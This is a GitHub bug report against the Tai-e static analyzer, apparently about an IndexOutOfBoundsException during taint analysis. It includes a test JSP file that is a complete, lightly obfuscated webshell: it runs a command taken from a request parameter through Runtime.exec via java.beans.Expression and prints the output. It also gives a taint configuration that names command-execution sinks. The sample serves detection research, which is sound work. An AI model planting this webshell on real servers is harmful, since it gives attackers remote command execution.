### ISSUE TITLE
Taint analysis transfers throw IndexOutOfBoundsException

### ISSUE THREAD

**Issue by struce2** [pascal-lab/Tai-e#31]
### Describe the bug

When analyzing the program, Tai-e throw a java.lang.IndexOutOfBoundsException, here is the stack traceback of the reported error.

<img width="1016" alt="image" src="https://user-images.githubusercontent.com/17916470/218676227-6a049e21-26ac-433b-ac50-689587442f3c.png">

This is the site information before the error, hope it can provide you with some help.

<img width="1305" alt="image" src="https://user-images.githubusercontent.com/17916470/218682319-02609de7-8270-439e-a822-a32f7ac50013.png">

callSite's invokeExpr points to "newInstance" instead of "<init>"， this does not look as expected?

Here is my jsp code
```jsp
<%@ page import="java.beans.Expression" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.InputStream" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%--
使用Expression类实现JSP Webshell
--%>
<%


    String cmd = request.getParameter("ladypwd");
    Expression expr = new Expression(Runtime.getRuntime(), "e"+"x"+"e"+"c", new Object[]{cmd});
    Process p = (Process)expr.getValue();
    InputStream is = p.getInputStream();
    StringBuilder sb = new StringBuilder();
    BufferedReader br = new BufferedReader(new InputStreamReader(is));
    String line;
    while((line = br.readLine()) != null) {
        sb.append(line).append("\n");
    }
    out.print("<pre>");
    if (sb.length() > 0) {
        out.print(sb.toString());
    }
    out.print("</pre>");
%>

```

### Tai-e arguments

`cmdline` 
```bash
--input-classes=org.apache.jsp.bf6wgpw0qqyy9orw316ihzckb5xf7qo1,javax.servlet.http.HttpServletResponseWrapper,javax.servlet.http.HttpServletRequestWrapper
-java
8
-scope
APP
-ap
-a
pta=action:dump;action-file:dumpfile;taint-config:src/test/resources/pta/taint/taint-config.yml;only-app:false;implicit-entries:false
-cp
/path/to/javax.servlet-api-4.0.1.jar:/path/to/compiler_dir
```

The compiler_dir you can download the attachment.

[compiler.zip](https://github.com/pascal-lab/Tai-e/files/10730347/compiler.zip)

`TaintConfig`
```yml
sources:
  - { method: "<javax.servlet.ServletRequest: java.lang.String getParameter(java.lang.String)>", type: "java.lang.String" }
  - { method: "<javax.servlet.ServletRequestWrapper: java.lang.String getParameter(java.lang.String)>", type: "java.lang.String"}

sinks:
  - { method: "<java.lang.Runtime: java.lang.Process exec(java.lang.String)>", index: 0 }
  - { method: "<java.lang.ClassLoader: java.lang.Class defineClass(byte[],int,int)>", index: 0}
  - { method: "<java.beans.Expression: java.lang.Object getValue()>", index: base}

transfers:
  - { method: "<java.beans.Expression: void <init>(java.lang.Object,java.lang.String,java.lang.Object[])>", from: 2, to: base, type: "void"}
```

### Runtime environment infomation

OS: macOS Monterey 12.6
IDE: IntelliJ IDEA 2022.2.1 (Ultimate Edition)
Tai-e version: commit [3f1f27d](https://github.com/pascal-lab/Tai-e/tree/3f1f27dfa371e52ee01cbd4b9ad04966a0613021)
Java Version: 
```
openjdk version "17.0.3" 2022-04-19 LTS
OpenJDK Runtime Environment Zulu17.34+19-CA (build 17.0.3+7-LTS)
OpenJDK 64-Bit Server VM Zulu17.34+19-CA (build 17.0.3+7-LTS, mixed mode, sharing)
```
